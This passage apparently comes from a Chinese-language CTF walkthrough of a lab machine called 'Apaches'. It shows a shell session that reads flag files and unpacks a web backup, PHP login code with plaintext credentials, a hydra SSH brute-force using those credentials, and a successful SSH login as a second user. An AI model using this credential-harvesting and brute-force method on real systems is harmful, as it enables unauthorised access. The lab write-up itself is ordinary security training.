Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) sacagawea@apaches:\/home\/sacagawea$ cat user.txt \n\n  _____ _                      __                                                      \n |  ___| | __ _  __ _    ___  \/ _|  ___  __ _  ___ __ _  __ _  __ ___      _____  __ _ \n | |_  | |\/ _` |\/ _` |  \/ _ \\| |_  \/ __|\/ _` |\/ __\/ _` |\/ _` |\/ _` \\ \\ \/\\ \/ \/ _ \\\/ _` |\n |  _| | | (_| | (_| | | (_) |  _| \\__ \\ (_| | (_| (_| | (_| | (_| |\\ V  V \/  __\/ (_| |\n |_|   |_|\\__,_|\\__, |  \\___\/|_|   |___\/\\__,_|\\___\\__,_|\\__, |\\__,_| \\_\/\\_\/ \\___|\\__,_|\n                |___\/                                   |___\/                          \n\n****(************************************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.*,,,,,,\n**\/*******************\/****************.,.,*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/,,,,,,\n***************************************.,%\/*,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,%,,,,,\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/***********************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/%,,,,\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/****************,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(,,,\n\/\/\/\/\/\/\/\/\/((((((((((((((\/\/\/\/(\/\/\/\/\/\/*************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/,,\n\/\/\/\/(((((((((((((((((((((((((\/\/\/\/\/\/\/**********,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/,\n\/\/((((((((((###########((((((((\/\/\/\/\/(*************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*,,\n(((((((((####################(((((((\/*,,,,,,,,\/\/,,,,\/\/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n(((((((((%########%###%######((((,,,,,,,,,,,*(\/(,,,**\/((\/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n((((((########%%%%%%%%%%%%%###,,,,,,,,,,,,,,*((\/,,,,*((((((*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n((((((########%%%%%%%%%%%%%%,,,,,,,,,,,,,,**\/(\/\/,,,,\/\/(((\/(\/\/*,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n(((((########%%%%%%%%%%%%%#,,,,,,,,,,,,,,,*((\/**,,*\/\/\/(((\/\/*****,,,,*,,,,,*,,,,,,,,,,,,,,,\n((((########%%%%%%%%%%%%%(,,,,,,,,,,,,,,*,****\/((**\/\/((\/\/\/***,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n(((#######%%%%%%%%%&&%%%%,,,,,,,,,,,**\/\/(((#((##%#((((((\/*,,,,,,,,,,,**,,,,,,,,,,,,,,,,,,,\n##########%%%%%%%%%%&%%%,,,,,,,,,*,***((########%%%%%(\/*\/*(,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*\n##########%%%%%%&%&&&&&%,,,,,,*******\/\/((######%%%%%%%%#(,,*\/,,,,,,,,,,*,,,,,,,,,,,,,,,,,,\n###########%%%%%&&&&&&%*,,,,*****\/\/\/\/(((######%%%%%%%%%%%#\/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n#######%%%%%%%%&&&&&&&%,*,,*******,,**\/\/((#####%%%%%%%%%%##\/,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,\n###%%%%%%%%%%%%&&&&&&&&(,,,*******\/((\/*\/*\/\/(######(((#%%%###,,,,,,,,,,,,,,,,,,,,,,,,,,\/,,,\n###%%%%%%%%%%%%&&&&&&&&,,,***\/\/*\/\/\/,.(,,**(#%%%#(*,**(#%%%%#,*#\/,,,,,,,,,,,,,,,,,,,,,,,,,,\n###%%%%%%%%%%%&%&&&&&&,,***\/\/\/(#######(**\/#%&&%%#%,\/&##(%%%#(##****,,,,,,,,,,,,,*,,,,,,,,,\n##%%%%%%%%%%%&&&&&&&%\/,,,,*\/\/\/(#####((\/\/\/(%&%%%%%%%%%%%%&%%###\/,*,,,,,,,,,,,,,,,,,,,,,,,,,\n#%%%%%%%%%%%%&&&&&&&%(\/,,,**\/\/\/\/(((((***(#&&%%%%%%%%%%%%%%%%%#\/***,,,,,,,,,,,,,,,,,,,,,,,,\n##%%%%%%%%%%%%%&&&&&%#(\/\/***\/\/\/\/((((***\/\/#%&&%%%%%%%%%%%%%(%#,*\/**,,,,,,,,,,,,,,,,,,,,,,,,\n###%%%%%%%%%%%%%&%%#(#((\/*,\/\/\/\/\/\/(\/******\/##\/\/%%%%%%%%%%%%%*,,,\/***,,,,,,,,,,,,,,,,,,,,,,,\n####%%%%%%%%%%%%%%%*((\/\/(,#\/\/\/\/\/\/\/\/\/\/\/(#%#%%%%&&%%%%%%%%#%%%,,*\/*,,,,,,,,,,,,,,,,,,,,,,,,,\n#####%%%%%%%%%&%%%.\/\/#(\/,.%%\/\/\/\/\/*,,,*,**((#%%%%%%%%%%%(%%\/%,,*(*,,,,,,,,,,,,,,,,,,,,,,,,,\n#####%%%%%%%%%&%,*(###(*%%%&&#\/\/*****\/(####%%%%%%%%%%%\/,%#,,,,,\/*,,,,,,,,,,,,,,,,*,,,,,,,,\n######%%%%%%%%&((####(*#%%%#*,,,******\/\/*((###%%%%%%#*,\/%%\/,,,,\/,,,,,,,,,,,,,,,,,,,,,,,,,,\n######%%%%%%%%(,(#\/\/,*,%%%#*,*,.,,***\/((#########.\/\/#\/(%%%((,,,,*,,,,,,,,,,,,,,,,,,,,,,,,,\n#######%%%%%%,,##(%#\/%&%%\/*,*,,.,*###(**\/\/\/(,,,,,*((#\/%%&(,,,,,,(###%&&&,*,,,,,,,,,,,,,,,,\n########%%%%,\/#%#%%%,(\/\/*,,**,..,,,,,,,,,,\/%,,,,\/#%##&%&#,,,,,**\/*\/%#%(&%#**,,,,,,,,,,,,,,\n#########(\/,,*,\/%%&,,*,**,*,\/,,,,,,,,,,*\/,##**,#*%#%%%&&#\/(,,.,*\/***\/*(%##%%\/(%\/\/%#*,,,,,,\n######(,,,,,,####%,,*\/\/\/,\/*,,,,,,,*,,,##%***,(\/#*#((&&&&&\/*,,,,,,,***,%%\/\/(%%%%%%%(#&,*,,*\n(###\/,,,,,,,##%%&.,*,#\/\/\/(,(\/,,,,,*,***\/\/**.\/*##(#(#%%%%&****,,*,,,**,#%%***\/\/(%(%\/%#,,,,*\n###*,,,,,,,#%#&%#,*,#(#\/%#((#&,*****\/\/\/,&%(%(%%#,#*&&&&&*\/*\/*,,.,,,**\/\/\/*,*,**\/\/\/%(%\/%\/*,,\n((,,,,,.,,\/**\/%%,*,##%(%%\/(%&*,,**\/\/(\/*,,%*%%%\/#(#%&&&(&***,,,,,.,**\/\/\/\/*,,,**\/\/\/,##(#%%%%\n\/,,.,,,,,##(%&,,,,#\/%%\/%\/(#%*,,,**\/\/\/*,%(.%#%%%,\/#%(&&#&,*\/*,,,..,,*\/\/\/\/*,,,,\/,%%*\/\/%%(\/\/\/\n.,,...,,,#(%%(,**(\/%%#%%#%%%,,**\/\/\/*,%%,.#*\/%#,*#((&(###,\/,,.,...*,.,\/\/\/*,,,*\/,(%,*(###%(\/\n,,....,,\/#(%%,(\/(##&%#%*\/%*%.,*\/\/\/*%#(.#%.%\/%%*(&&,&%%#*,,,,,,,.,\/,..,\/,#%\/,**,,,,*\/###%##\n.,,,,,,,(*\/(#\/(((%&*####\/%#%(,\/\/,,%%&*&(#%,\/#\/\/%%%&&%&%,*,,.,,,,.*\/.,,\/*,,,,\/\/,,,.#%(%%%%&\n*(,,,,*(%(#\/(\/,(#%.%#%\/##%,&,*\/*%%\/%&.%(%\/%%#,##((##%&#,\/,\/,.,*,\/,\/,.,*\/*,,*\/,,,,,#%&%%%%&\n.,,*,,###%#(#*#(%&&#%%#(%&,%,*%&*%&,,#(%,%(%\/\/&(&&&%%%&*(,*,,,,,*,*\/.,**,,,*\/.,,,*\/\/\/%%%#&\n,,,,,,\/#%%*(,(##%\/\/#(,\/,(**\/#\/\/\/(\/((%*%%\/%*%*#&&&%&&,%\/,#,,(\/.,,.,,\/,,,*,*****,,*\/\/\/#%%%%%\n,,,,\/#*#(###%%#&\/&#%(%\/%&,%\/,%&#%,%%*&&*%,%**(%&&&&&,&(,#,*,,,,,,*(*\/,,,%%\/*,*,*\/\/((#%%%%%\n,\/,#(#%#%#%%#%&%&#%%%&%&,#&,%&(%&*%&&&\/%&%%\/%%(%##%%&&*%&,,\/*,,*\/,***,,(#%(,,,*\/(((,%%%(%&\n,.((%%#%#%%#%%&%&%&%&%&&%&%(&%%&,%&\/%&%&(%%%&(%&&&&\/&&(&%\/(\/(*,*(%,\/\/,,,*,,,%%*(((,#%%&#&&\n,*\/#%%%#%##%#%#&%&#&#&&(&&,&&%&&%&%&&(&%&&*&&&&&&&&&&(%&\/#\/\/\/,,,\/%%(\/*,*,,\/%%&(((\/\/\/\/%%\/%%\n(\/%(###%(%%#&#%#&&&&%&\/&&(&&#%&(&&%&%&&%%#%(&&&&&&%&&%&&%&(\/*(,*\/(*\/\/*,,,,,,*(((,#&\/*%%%##\n#%((#%%#%#%%%%&%&%&%&&%&&(&&%&%%&#&&%&#&&\/&&#%%%&&&&%&&%&&#(\/((,,**(\/*,,,,**,#%,,%%\/\/%%%%#\n%###%#%%#%#%#%#%(&%&&(&&,%&%&&%&&%&#&&%&%%%&%&&&&&&&%&&%&&%(\/*,***\/((\/,,,,*,,#%%,**%%%%&%#\n(####%#%%%%#%%%&%&%&#%%%%&%%&(&&%&&%&(%%(&&&&&&&&&&%%&%%&%&&*(#\/(\/\/\/(&%%,\/,.#%*%%*,,,\/&&##\n(\/(##(%\/%(%#&(&\/%(&&#&&*%&%&&%&#&&#&&%%##%#%%&&&%&&%&&%&&%&&\/\/\/*,,\/,(%,,,*,,(&****,,,*%&#*\n##%\/%##%(%\/%(&#%&%&*%&*%&(%&*&&%&%%&*%%*%%&&&%&&&&&&&#&&#&&*******,,,(,,,**\/\/***,,,,,*%%#*\n,,,,****(&#&\/&\/&*%#%&\/*&&#&#%&,%&\/&%\/%%#&&%&&&&(&&(&&%&&%&&,,\/(,**,,,,,,*****,,,,,,,,**%**\n(%%(%\/%*%,&,%(%\/(\/**#\/#&*&&*&##&*%&,%%&&&&&&&&&#&%%&(%&(&&,,,*,,*,,,,,,,****,,,,,,,,,,(#*,\n\nYou are on fire!!\n\nFlag: FlagsNeverQuitNeitherShouldYou\n(remote) sacagawea@apaches:\/home\/sacagawea$ cd Backup\/\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ ls -la\ntotal 23128\ndrwxrwxr-x 2 sacagawea sacagawea     4096 Apr 20 05:48 .\ndrwxr-xr-x 6 sacagawea sacagawea     4096 Jul 13  2023 ..\n-rwx------ 1 sacagawea sacagawea 23673389 Apr 20 05:48 Backup.tar.gz\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ tar -zxvf Backup.tar.gz \nusr\/local\/apache2.4.49\/htdocs\/\nusr\/local\/apache2.4.49\/htdocs\/images\/\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/10.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/2.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/18.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/3.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/1.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/11.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/16.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/14.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/4.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/8.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/6.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/15.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/13.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/5.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/7.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/12.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/17.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/9.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/favicon.ico\nusr\/local\/apache2.4.49\/htdocs\/images\/previous.png\nusr\/local\/apache2.4.49\/htdocs\/images\/logo.png\nusr\/local\/apache2.4.49\/htdocs\/images\/loading.gif\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_logo.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/2.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/3.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/1.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/4.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_teamhexa_hover.png\nusr\/local\/apache2.4.49\/htdocs\/images\/close.png\nusr\/local\/apache2.4.49\/htdocs\/images\/next.png\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_teamhexa.png\nusr\/local\/apache2.4.49\/htdocs\/images\/bx_loader.gif\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_footerhexa.png\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_contactiframe.png\nusr\/local\/apache2.4.49\/htdocs\/index.html\nusr\/local\/apache2.4.49\/htdocs\/robots.txt\nusr\/local\/apache2.4.49\/htdocs\/css\/\nusr\/local\/apache2.4.49\/htdocs\/css\/bootstrap.min.css\nusr\/local\/apache2.4.49\/htdocs\/css\/templatemo_style.css\nusr\/local\/apache2.4.49\/htdocs\/css\/templatemo_misc.css\nusr\/local\/apache2.4.49\/htdocs\/css\/font-awesome.min.css\nusr\/local\/apache2.4.49\/htdocs\/css\/animate.css\nusr\/local\/apache2.4.49\/htdocs\/fonts\/\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.woff\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.eot\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.svg\nusr\/local\/apache2.4.49\/htdocs\/fonts\/FontAwesome.otf\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.ttf\nusr\/local\/apache2.4.49\/htdocs\/js\/\nusr\/local\/apache2.4.49\/htdocs\/js\/jquery-1.10.2.min.js\nusr\/local\/apache2.4.49\/htdocs\/js\/jquery.lightbox.js\nusr\/local\/apache2.4.49\/htdocs\/js\/templatemo_custom.js\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ ls -la\ntotal 23132\ndrwxrwxr-x 3 sacagawea sacagawea     4096 Apr 20 05:50 .\ndrwxr-xr-x 6 sacagawea sacagawea     4096 Jul 13  2023 ..\n-rwx------ 1 sacagawea sacagawea 23673389 Apr 20 05:50 Backup.tar.gz\ndrwxrwxr-x 3 sacagawea sacagawea     4096 Apr 20 05:50 usr\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ cd usr\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr$ ls -la\ntotal 12\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 .\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 ..\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 local\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr$ cd local\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local$ ls -la\ntotal 12\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 .\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 ..\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 apache2.4.49\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local$ cd apache2.4.49\/\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local\/apache2.4.49$ ls -la\ntotal 12\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 .\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 ..\ndrwxrwxr-x 6 sacagawea sacagawea 4096 Oct 10  2022 htdocs\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local\/apache2.4.49$ cd ..\/..\/..\/..\/\n(remote) sacagawea@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 Backup\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) sacagawea@apaches:\/home\/sacagawea$ cd Development\/\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development$ ls -la\ntotal 68\ndrwxrwxr-x 7 sacagawea sacagawea  4096 Oct 10  2022 .\ndrwxr-xr-x 6 sacagawea sacagawea  4096 Jul 13  2023 ..\ndrwx------ 2 sacagawea sacagawea  4096 Oct  6  2022 admin\ndrwxrwxr-x 2 sacagawea sacagawea  4096 Oct 10  2022 css\ndrwxrwxr-x 2 sacagawea sacagawea  4096 Oct 10  2022 fonts\ndrwxrwxr-x 4 sacagawea sacagawea  4096 Oct 10  2022 images\n-rwxrwxr-x 1 sacagawea sacagawea 33940 Oct 10  2022 index.html\ndrwxrwxr-x 2 sacagawea sacagawea  4096 Oct 10  2022 js\n-rwxrwxr-x 1 sacagawea sacagawea   116 Oct 10  2022 robots.txt\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development$ cd admin\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ ls -la\ntotal 24\ndrwx------ 2 sacagawea sacagawea 4096 Oct  6  2022 .\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 ..\n-rwx------ 1 sacagawea sacagawea  689 Oct  6  2022 1a-login.php\n-rwx------ 1 sacagawea sacagawea  724 Oct 24  2020 1b-login.css\n-rwx------ 1 sacagawea sacagawea  773 Oct 10  2022 2-check.php\n-rwx------ 1 sacagawea sacagawea  267 Nov  5  2021 3-protect.php\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ cat 1a-login.php \n<?php\n\/\/ (A) LOGIN CHECKS\nrequire "2-check.php";\n\n\/\/ (B) LOGIN PAGE HTML ?>\n<!DOCTYPE html>\n<html>\n  <head>\n    <title>Login Apaches<\/title>\n    <link href="1b-login.css" rel="stylesheet">\n  <\/head>\n  <body>\n    <?php if (isset($failed)) { ?>\n    <div id="bad-login">Invalid email or password.<\/div>\n    <?php } ?>\n\n    <form id="login-form" method="post" target="_self">\n      <h1>PLEASE SIGN IN<\/h1>\n      <label for="user">User<\/label>\n      <input type="text" name="user" required\/>\n      <label for="password">Password<\/label>\n      <input type="password" name="password" required\/>\n      <input type="submit" value="Sign In"\/>\n    <\/form>\n  <\/body>\n<\/html>\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ cat 1b-login.css \n\/* (A) WHOLE PAGE *\/\nhtml, body { font-family: arial, sans-serif; }\n\n\/* (B) LOGIN FORM *\/\n#login-form {\n  padding: 20px;\n  background: #f2f2f2;\n  max-width: 320px;\n  margin: 0 auto;\n}\n#login-form h1 {\n  font-size: 1.5em;\n  margin: 0;\n  color: #9b9b8d;\n}\n#login-form label, #login-form input {\n  box-sizing: border-box;\n  display: block;\n  width: 100%;\n  margin-top: 10px;\n}\n#login-form input { padding: 10px; }\n#login-form input[type=submit] {\n  background: #ad4343;\n  color: #fff;\n  border: 0;\n  cursor: pointer;\n}\n\n\/* (C) INVALID LOGIN *\/\n#bad-login {\n  padding : 10px;\n  margin-bottom: 10px;\n  background: #ffe7e7;\n  border: 1px solid #ff3e3e;\n  color: #c10000;\n  font-weight: bold;\n}(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ cat 2-check.php\n<?php\n\/\/ (A) START SESSION\nsession_start();\n\n\/\/ (B) HANDLE LOGIN\nif (isset($_POST["user"]) && !isset($_SESSION["user"])) {\n  \/\/ (B1) USERS & PASSWORDS - SET YOUR OWN !\n  $users = [\n    "geronimo" => "12u7D9@4IA9uBO4pX9#6jZ3456",\n    "pocahontas" => "y2U1@8Ie&OHwd^Ww3uAl",\n    "squanto" => "4Rl3^K8WDG@sG24Hq@ih",\n    "sacagawea" => "cU21X8&uGswgYsL!raXC"\n  ];\n\n  \/\/ (B2) CHECK & VERIFY\n  if (isset($users[$_POST["user"]])) {\n    if ($users[$_POST["user"]] == $_POST["password"]) {\n      $_SESSION["user"] = $_POST["user"];\n    }\n  }\n\n  \/\/ (B3) FAILED LOGIN FLAG\n  if (!isset($_SESSION["user"])) { $failed = true; }\n}\n\n\/\/ (C) REDIRECT USER TO HOME PAGE IF SIGNED IN\nif (isset($_SESSION["user"])) {\n  header("Location: index.php");\n  exit();\n}<\/code><\/pre>\n
\"image-20240420135310301\"<\/div><\/p>\n
ssh\u7206\u7834<\/h3>\n
\u627e\u5230\u4e86\u4e00\u4e9b\u660e\u6587\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
Geronimo\nSacagawea\nSquanto \nPocahontas\ngeronimo\nsacagawea\nsquanto \npocahontas<\/code><\/pre>\n
12u7D9@4IA9uBO4pX9#6jZ3456\ny2U1@8Ie&OHwd^Ww3uAl\n4Rl3^K8WDG@sG24Hq@ih\ncU21X8&uGswgYsL!raXC<\/code><\/pre>\n
\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/192.168.0.160 -t 16\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-20 01:57:26\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:8\/p:4), ~2 tries per task\n[DATA] attacking ssh:\/\/192.168.0.160:22\/\n[22][ssh] host: 192.168.0.160   login: pocahontas   password: y2U1@8Ie&OHwd^Ww3uAl\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-20 01:57:34<\/code><\/pre>\n
\u4fe1\u606f\u641c\u96c6<\/h4>\n
\u5c1d\u8bd5ssh\u767b\u5f55<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ ssh pocahontas@192.168.0.160\n\n                                                                        >>       >======>         >>           >=>    >=>    >=> >=======>   >=>>=>   \n                                                                       >>=>      >=>    >=>      >>=>       >=>   >=> >=>    >=> >=>       >=>    >=> \n                                                                      >> >=>     >=>    >=>     >> >=>     >=>        >=>    >=> >=>        >=>       \n                          ~                                          >=>  >=>    >======>      >=>  >=>    >=>        >=====>>=> >=====>      >=>     \n                    7~   ~&.                                        >=====>>=>   >=>          >=====>>=>   >=>        >=>    >=> >=>             >=>  \n                    G!J !75!   ~G     :                            >=>      >=>  >=>         >=>      >=>   >=>   >=> >=>    >=> >=>       >=>    >=> \n                   ?~:B!. 5Y^!~^B. :~J&                           >=>        >=> >=>        >=>        >=>    >===>   >=>    >=> >=======>   >=>>=>\n                 .GG?~    B^...PB?!^ ?5 .                         \n                7&G:  7. JB7?7^..   ^&P&Y .7#                     If at first you don't succeed. Try, try again! Sometimes the second time returns more!              .GG.  ~J. ?@5:  :~.  Y@@@@??!?#                     \n             :#~  ~Y~  JJ  :77: .J&@#57:  :&!.~Y  .:              \n            :&. ^P7  ^J::!7^.:!YJ!:....  Y@@@@@&J5@!              \n            @7 Y5  :GP77~::~!~...:^:..:J#&#GPJ!:.PG               \n           P@~B# ^B@G~^^!!~^^^^:...^7J7.       ^BP^?:             \n          ^@@@@@&@#~7G5J7~::.:^~?JJ7~::^^~~~?B@@@@@&              \n          &J!7?P#@B@@@B!:!?77???7!~~!!?J5PPP5YJ??YPYJ~.           \n         ?P       :?B@&#@#?7!^^~?55Y7^:..       .^?J5Y^           \n         ?B^^^::..    ~G&@#YP#&@B!....::::^~75B&@@@@#G!           \n         :&~J?P&@@G?7!^..BG!~7B@#5J7!!7?JPGBB#BB&&@@B^            \n         !5 ##J?PY    :JP&    .@&G5JY5GG57^:...   .~YBJ           \n        ~5  :P7!^ ..^   ~@P~~~BB7^:.  .:~5G! .:!5B&@G!!.          \n       .P      ~PGB#5   P:5!B&7~:Y&#&B&&#GPY7!!?5B@@&G:           \n       Y7   ^^ .5GGB!  5~!7:7!G:. 7B7?~^^?G#P!....:GP             \n       .~^JJ^   .     .G #..J ##!  J#~..:.  .7P#?^:.              \n          !Y:^. ?.    ~Y &  7 PJ!P7^@@&Y!^^.  .J&Y                \n           P!         ~P @. : Y&  5GPJ#??~~?#G!!!7.               \n           !?       ^?J&.#J   B##: .  B7:.   5^                   \n            !!^.:!PP^  !G!&.  5^7?J   ?#:~~^.:B^                  \n              .::..!?   .!JG. &^  BG~.:@       .                  \n                    JG!!^..5YYG5^ &..~Y&                          \n                   .G...^?~  .  JB!    .                          \n                   .G!7!:                                   \n\npocahontas@192.168.0.160's password: \nWelcome to Ubuntu 20.04 LTS (GNU\/Linux 5.4.0-128-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sat 20 Apr 2024 05:58:29 AM UTC\n\n  System load:  0.1                Processes:               136\n  Usage of \/:   20.8% of 39.07GB   Users logged in:         1\n  Memory usage: 22%                IPv4 address for enp0s3: 192.168.0.160\n  Swap usage:   0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\n143 updates can be installed immediately.\n2 of these updates are security updates.\nTo see these additional updates run: apt list --upgradable\n\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. Check your Internet connection or proxy settings\npocahontas@apaches:~$ <\/code><\/pre>\n
pocahontas@apaches:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 pocahontas pocahontas  4096 Apr 20 05:57 .\ndrwxr-xr-x 6 root       root        4096 Oct  9  2022 ..\n-rw------- 1 pocahontas pocahontas     0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 pocahontas pocahontas   220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 pocahontas pocahontas  3771 Oct  9  2022 .bashrc\ndrwx------ 2 pocahontas pocahontas  4096 Apr 20 05:57 .cache\ndrwxrwxr-x 3 pocahontas pocahontas  4096 Oct 10  2022 .local\n-rw-r--r-- 1 pocahontas pocahontas   807 Oct  9  2022 .profile\n-rw------- 1 pocahontas pocahontas 10267 Oct 10  2022 user.txt\npocahontas@apaches:~$ whoami;id\npocahontas\nuid=1003(pocahontas) gid=1003(pocahontas) groups=1003(pocahontas)\npocahontas@apaches:~$ cat user.txt \n  _____ _                      __                         _                 _            \n |  ___| | __ _  __ _    ___  \/ _|  _ __   ___   ___ __ _| |__   ___  _ __ | |_ __ _ ___ \n | |_  | |\/ _` |\/ _` |  \/ _ \\| |_  | '_ \\ \/ _ \\ \/ __\/ _` | '_ \\ \/ _ \\| '_ \\| __\/ _` \/ __|\n |  _| | | (_| | (_| | | (_) |  _| | |_) | (_) | (_| (_| | | | | (_) | | | | || (_| \\__ \\\n |_|   |_|\\__,_|\\__, |  \\___\/|_|   | .__\/ \\___\/ \\___\\__,_|_| |_|\\___\/|_| |_|\\__\\__,_|___\/\n                |___\/              |_|                                                   